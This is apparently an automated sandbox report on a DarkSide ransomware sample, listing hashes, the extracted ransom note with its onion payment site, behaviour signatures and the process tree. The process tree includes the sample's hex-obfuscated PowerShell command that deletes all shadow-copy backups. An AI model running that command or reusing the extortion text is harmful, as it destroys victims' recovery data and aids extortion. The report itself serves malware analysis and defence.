Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-05-2021 14:32

General

  • Target

    4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a.exe

  • Size

    30KB

  • MD5

    f00aded4c16c0e8c3b5adfc23d19c609

  • SHA1

    86ca4973a98072c32db97c9433c16d405e4154ac

  • SHA256

    4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a

  • SHA512

    a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf

Malware Config

Extracted

Path

C:\\README.f2cbf9aa.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a.exe
    "C:\Users\Admin\AppData\Local\Temp\4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1780
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1356
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2784
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.f2cbf9aa.TXT
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2980

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      238fea5c71df9a020a0227caf3e81b33

      SHA1

      561f46997b585a5c55600ddcbec930e6737e65d3

      SHA256

      a887e4b942ccc20bf8663236c01adc48eb6ffd751b210c45c7f3298f0789c945

      SHA512

      ba6343eada93a81836960383f65f72e82b47e614ca8898278e55ad293fc8ecd422d443800678a568126e1896fb39d76d7bf3db32e31ee5e33178f3c254be581c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      5b282762f2082275c5539a9797d3f9ae

      SHA1

      5e0c4630c64e9775043911266590ffeb0f60b7b3

      SHA256

      4f9a922a5072dffba94ab734bec6217f6fd4de28d62c2e5a0503c67a05f8b7c9

      SHA512

      cd2391a02a37b8958b40a678677c7ecdc92c4849c7b9f1cc8ed421913e2b04d3188990cc6299aa5d48e3663555cd244383d22d3a14023c2481a6d68163bfd5d3

    • C:\Users\Admin\Desktop\README.f2cbf9aa.TXT
      MD5

      f418a249405444da33cc73b402a26306

      SHA1

      1a6c493e74036f93f0dae4b65e6c543c213ce418

      SHA256

      b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09

      SHA512

      b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

    • memory/1632-60-0x0000000075551000-0x0000000075553000-memory.dmp
      Filesize

      8KB

    • memory/1780-67-0x0000000002794000-0x0000000002796000-memory.dmp
      Filesize

      8KB

    • memory/1780-65-0x0000000002750000-0x0000000002751000-memory.dmp
      Filesize

      4KB

    • memory/1780-64-0x000000001AC00000-0x000000001AC01000-memory.dmp
      Filesize

      4KB

    • memory/1780-66-0x0000000002790000-0x0000000002792000-memory.dmp
      Filesize

      8KB

    • memory/1780-68-0x00000000023F0000-0x00000000023F1000-memory.dmp
      Filesize

      4KB

    • memory/1780-69-0x000000001C450000-0x000000001C451000-memory.dmp
      Filesize

      4KB

    • memory/1780-70-0x000000001C520000-0x000000001C521000-memory.dmp
      Filesize

      4KB

    • memory/1780-63-0x00000000025A0000-0x00000000025A1000-memory.dmp
      Filesize

      4KB

    • memory/1780-62-0x000007FEFC031000-0x000007FEFC033000-memory.dmp
      Filesize

      8KB

    • memory/1780-61-0x0000000000000000-mapping.dmp